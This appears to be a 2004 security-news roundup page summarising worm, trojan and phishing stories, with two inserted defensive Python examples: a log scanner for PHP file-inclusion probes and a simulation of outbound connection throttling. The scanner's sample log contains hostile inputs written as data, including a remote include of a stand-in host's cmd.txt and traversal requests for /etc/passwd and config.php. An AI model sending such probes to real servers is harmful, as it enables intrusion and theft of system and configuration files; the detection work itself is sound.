Fast-Acting Hackers Put Out Trojan Attacking IE (Information Week)  12/28/04
It took hackers less than a week to produce a working exploit that attacks a new, unpatched vulnerability in Microsoft's Internet Explorer, security firms said Tuesday.

Phel.a, a Trojan horse discovered Monday, attempts to exploit the flaw in Internet Explorer 6.0 dubbed "Microsoft Internet Explorer HTML Help Control Local Zone Security Restriction Bypass" that was first made public less than a week before, on December 21. [Click here for Full Story]

New Santy Worm Threatens More Sites (Information Week)  12/27/04
A new version of the Santy worm appeared over the weekend and poses a broader threat than its ancestors.

A new version of the Santy worm appeared over the weekend, and according to analysis done by some security firms, poses a broader threat than its ancestors, which used Google to spot vulnerable Web bulletin boards, then defaced them.

Dubbed Santy.e, the worm differs significantly from its predecessors, said Moscow-based Kaspersky Labs in an alert. Rather than target only those Web sites running phpBB, software for creating Internet forums using the PHP scripting language, the worm can exploit any site whose PHP scripts pass a request parameter to an include, letting an attacker pull in an arbitrary file. [Click here for Full Story]

Google Worm Shows Bad Guys Want Efficiency, Too (Information Week)  12/21/04
A new worm uses the search engine Google to find vulnerable systems, automatically connect to them, and deface a Web site.

Kaspersky Labs, a security software company in Moscow, said Tuesday that it has detected a new worm that uses search site Google to automatically find vulnerable systems. The worm, called Net-Worm.Perl.Santy.a, queries Google to locate Web sites running vulnerable versions of phpBB, which is software for creating Internet forums using the PHP scripting language.

A week ago, the PHP Group, an open-source development organization, issued PHP 4.3.10 and PHP 5.0.3 to close the vulnerabilities this worm exploits. A fix of phpBB, version 2.0.11, was issued in mid-November. [Click here for Full Story]
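The Santy.e item above describes PHP scripts that include whatever file a request parameter names, and the Santy.a item describes a worm that finds phpBB installations by search engine rather than by scanning, so the probes arrive out of the blue with no referrer. The scanner below is an added example written for this page, not code from Kaspersky, phpBB or the PHP Group: it reads Apache combined-format access log lines and flags the three classic file-inclusion probe shapes (a remote URL, a directory-traversal path, or a NUL byte in a query parameter), then counts probes per source address. The log lines are constructed for the example; the IP addresses, script names and parameter names are assumptions.

```python
"""Flag PHP file-inclusion probes in web server access logs (added example)."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format:
# ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A parameter that names a remote resource: include("http://.../cmd.txt") fetches
# and runs attacker code when allow_url_fopen is on.  php:// covers the stream
# wrappers (php://input, php://filter) that reach the same include() path.
REMOTE_SCHEME = re.compile(r"^(https?|ftps?|php)://", re.I)
# "../" anywhere in the value: climbing out of the intended include directory.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def classify(value: str) -> Optional[str]:
    """Return why a parameter value looks like an inclusion probe, or None."""
    # parse_qsl already percent-decoded once; decode again so that
    # double-encoded probes (%252e%252e%252f) are seen as ../ too.
    v = unquote(value)
    if REMOTE_SCHEME.match(v):
        return "remote URL in parameter"
    if TRAVERSAL.search(v):
        return "path traversal"
    if "\x00" in v:
        return "NUL byte (truncates the include path)"
    return None


def scan_log(lines):
    """Return (ip, script path, parameter, reason) for every suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = classify(value)
            if reason:
                findings.append((m["ip"], parts.path, name, reason))
    return findings


def probe_sources(findings):
    """Probes per source address: one IP hitting several scripts is a scanner or worm."""
    return dict(Counter(ip for ip, _path, _param, _reason in findings))


# Constructed sample log lines (not captured traffic). Addresses are documentation ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Dec/2004:10:02:11 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [27/Dec/2004:10:02:13 +0000] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.0" 200 311 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [27/Dec/2004:10:02:14 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.0" 200 311 "-" "Mozilla/4.0"',
    '203.0.113.44 - - [27/Dec/2004:10:03:01 +0000] "GET /modules.php?name=%252e%252e%252fconfig.php HTTP/1.1" 404 221 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, path, param, reason in hits:
        print(f"{ip} {path} {param}: {reason}")
    print("sources:", probe_sources(hits))
```

Note that the probe in the second constructed line returned HTTP 200, which is the case that matters: a 404 means the script was not there, a 200 on a remote-URL include means the script ran whatever the worm pointed it at, and that host should be treated as compromised until the fetched file has been examined. The real fix on the server side is the one Santy.e exploits the absence of: never build an include path from request data, select from a fixed list of allowed files instead, and leave allow_url_fopen off.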

Zafi Spreads Like Crazy (Information Week)  12/15/04
The Zafi.d worm continued to sweep through the Internet Wednesday, creating such a flood of messages as it replicated that by one security vendor's estimate, it accounted for 10 percent of the world's mail. [Click here for Full Story]

New Internet Worm Disguises Itself as Electronic Christmas Card  (AP)  12/14/04
HELSINKI (AFP) - Internet security experts warned of a new virulent e-mail worm particularly successful in infecting computers as it is disguised as a multilingual electronic Christmas card.

"We think this worm will be big, because of its timing and the fact that it comes in 15 different European languages," Mikko Hyppoenen, head of anti-virus research at Finnish firm F-Secure, told AFP. [Click here for Full Story]

Langa Letter: Norton Antivirus and the Single-Layer Defense Fallacy  (Information Week)  12/06/04
A simple hack can disable Norton's script blocker. Fred Langa's solution not only works around that problem, but many others as well.

You may have seen the news that buzzed around the security community several weeks ago: Daniel Milisic posted a sample script that illustrates how easily Symantec/Norton Antivirus' ("NAV") script blocking can be defeated. His sample script does the following:

1) Sets the NAV Auto-Protect Service to "DISABLED"
2) Sets a registry key to uninstall Script Blocking
3) Creates and launches a VBScript file to download a harmless demonstration program
4) Launches the demonstration program
5) Reboots the PC  [Click here for Full Story]

Dial V for Virus (Information Week)  12/06/04
Hacker attacks and growing use of 'smart' cell phones raise new concerns about information security.

When Phil McMurray learned last week that the Cabir Bluetooth worm found an easier way to spread through a symbiotic relationship with the Skulls cell-phone Trojan, he was hardly surprised. McMurray, IT security officer at Advo Inc., a $1.2 billion-a-year provider of direct-mail services, was already in discussions with his security vendors about antivirus software and firewalls for several hundred smart phones and handhelds used by Advo employees. "These types of attacks serve as a catalyst," McMurray says. "We're beginning to take a serious look at these security issues. You don't want to get stuck behind the curve on something like this."  [Click here for Full Story]

HP Works On Software To Slow Computer Worms (Information Week)  12/01/04
Engineers at Hewlett-Packard are working on "virus-throttling" software that they say could slow the spread of Internet-borne viruses and worms.

Researchers for the Palo Alto, Calif.-based computer giant said Tuesday that the new software wouldn't destroy threats such as the "Blaster" worm, which crippled more than a million computers last summer.  [Click here for Full Story]

Bofra Worm Spreads by Banner Ads (PC World.Com) 11/22/04
Web site visitors who clicked on banner ads on a number of popular European Web sites this weekend could have infected their computers with variants of the Bofra worm, experts warn.

The attacks take advantage of an unpatched buffer overflow flaw in the way Internet Explorer 6 handles the IFrame tag, and have been confirmed on PCs running Windows XP with Service Pack 1 and Windows 2000, according to a warning posted Sunday on the SANS Institute Web site. Windows XP Service Pack 2 (SP2) is not vulnerable, it said. [Click here for Full Story]

Trojan Horse Hijacks Browser, Sends Users to Porn Site (Information Week) 11/18/04
Unwary surfers infected by a new Trojan horse may be in for a shock when their browser is unexpectedly redirected to a hard-core porn site, a security firm warned Wednesday. The Delf-IT Trojan horse lurks in the background on infected PCs, said U.K.-based Sophos, and waits for the user to visit Web sites that contain one of 50-some trigger phrases, then shunts the browser to a porno page.  [Click here for Full Story]

Warnings On New Phishing Threat (Information Week) 11/03/04
New, "more insidious" phishing scam is triggered when unsuspecting users open an E-mail.

Opening the wrong E-mail may soon be enough to empty your bank account. In an effort to woo security-conscious computer users, "phishers" have come up with a new technique to harvest online banking details without requiring users to click on a Web link and enter personal information on a submission form. [Click here for Full Story]

Latest Bagle Virus Remains a Threat (News Factor Network) 11/01/04
Three new variants of the infamous Bagle virus continue to spread after being launched late last week, although the frequency of attacks appears to have leveled off.

Like previous Bagle iterations, they are mass-mailing bugs that contain their own SMTP engine to build outgoing messages. They collect e-mail addresses from local files and then use those addresses to replicate themselves. [Click here for Full Story]
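The HP item above describes "virus-throttling" software that slows a worm rather than recognising it, and the Bagle item describes exactly the traffic such a throttle is built to catch: a mass-mailer with its own SMTP engine opening connections to a different mail server for every harvested address. The block below is an added example for this page, not HP's software: a simplified model of the published throttling idea (a small working set of recently contacted hosts, connections to hosts outside it queued and released at a fixed rate, and the queue length used as the infection signal). Working-set size, release rate, alarm threshold and the two workloads are assumptions chosen for illustration.

```python
"""Outbound-connection throttle in the style HP described (added example)."""
from collections import OrderedDict, deque


class Throttle:
    def __init__(self, working_set_size=5, new_per_tick=1, alarm_queue_len=10):
        self.working_set = OrderedDict()   # dest -> None, oldest first
        self.queue = deque()               # destinations waiting for a release slot
        self.working_set_size = working_set_size
        self.new_per_tick = new_per_tick   # new destinations admitted per second
        self.alarm_queue_len = alarm_queue_len
        self.alarmed = False

    def request(self, dest):
        """Return True if the connection may go out now, False if it is queued."""
        if dest in self.working_set:
            self.working_set.move_to_end(dest)   # refresh: recently used
            return True
        self.queue.append(dest)
        # A legitimate client rarely has more than a few new hosts waiting;
        # a worm fills the queue within a second of starting.
        if len(self.queue) >= self.alarm_queue_len:
            self.alarmed = True
        return False

    def tick(self):
        """Called once per second: admit up to new_per_tick queued destinations."""
        released = []
        for _ in range(self.new_per_tick):
            if not self.queue:
                break
            dest = self.queue.popleft()
            self._admit(dest)
            released.append(dest)
            # every other queued request for the same destination goes with it
            released.extend(d for d in self.queue if d == dest)
            self.queue = deque(d for d in self.queue if d != dest)
        return released

    def _admit(self, dest):
        self.working_set[dest] = None
        self.working_set.move_to_end(dest)
        while len(self.working_set) > self.working_set_size:
            self.working_set.popitem(last=False)   # evict the least recently used host


def simulate(events, **params):
    """Run a list of (second, destination) connection attempts through a Throttle."""
    th = Throttle(**params)
    clock = 0
    allowed = delayed = max_queue = 0
    alarm_at = None
    for t, dest in events:
        while clock < t:          # advance the clock, releasing queued requests
            th.tick()
            clock += 1
        if th.request(dest):
            allowed += 1
        else:
            delayed += 1
        max_queue = max(max_queue, len(th.queue))
        if th.alarmed and alarm_at is None:
            alarm_at = t
    return {"allowed": allowed, "delayed": delayed, "max_queue": max_queue, "alarm_at": alarm_at}


# Constructed workloads, not captured traffic.
# A user browsing: a handful of hosts, most of them revisited.
BROWSING = [(0, "www.example.com"), (0, "img.example.com"), (1, "www.example.com"),
            (2, "mail.example.net"), (3, "www.example.com"), (5, "cdn.example.org"),
            (6, "img.example.com"), (8, "news.example.com"), (9, "www.example.com")]

# A Bagle-style mass-mailer: one new SMTP server per harvested address, all at once.
MASS_MAILER = [(0, f"mx{i}.example-{i}.invalid") for i in range(40)]

if __name__ == "__main__":
    print("browsing:   ", simulate(BROWSING))
    print("mass-mailer:", simulate(MASS_MAILER))
```

The browsing trace is delayed by at most one second on each first contact and its queue never holds more than two hosts, which is what makes the scheme tolerable on a desktop; the mass-mailer trips the alarm in its first second and gets one new mail server per second instead of forty, which is the "slow the spread" effect the article describes. The caveat a practitioner will want: the throttle is per host and per protocol, so it needs to sit where it sees every new connection (the host's own network stack or the first-hop switch), and a worm that waits and sends slowly stays under it.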

Mac and Linux Not Immune to Viruses (Ziff Davis) 11/01/04
It's easy for administrators and computing professionals to get frustrated with users for all kinds of reasons, but security has to be one of the biggest reasons these days.

Let's consider the recent release of a malicious script for Mac OS X. This script itself is not really much of a threat because it has no means of propagation, but as a Mac admin I'd take that as small comfort. The script is a tool for building genuine worms with social engineering as the front door.  [Click here for Full Story]

Hot Tips
New Microsoft Critical Patches. Go here
Always use a firewall
Always have the latest Operating System patches installed
Always use an updated antivirus app
Always use an updated popup blocker application
Always use an updated antispyware application
Backup!
Link Broken?
If you find that a link on this page is no longer functioning, please let our webmaster know. Your assistance in keeping this site up to date is very much appreciated.


Copyright © 2004 I.S. Sentry, Inc. All rights reserved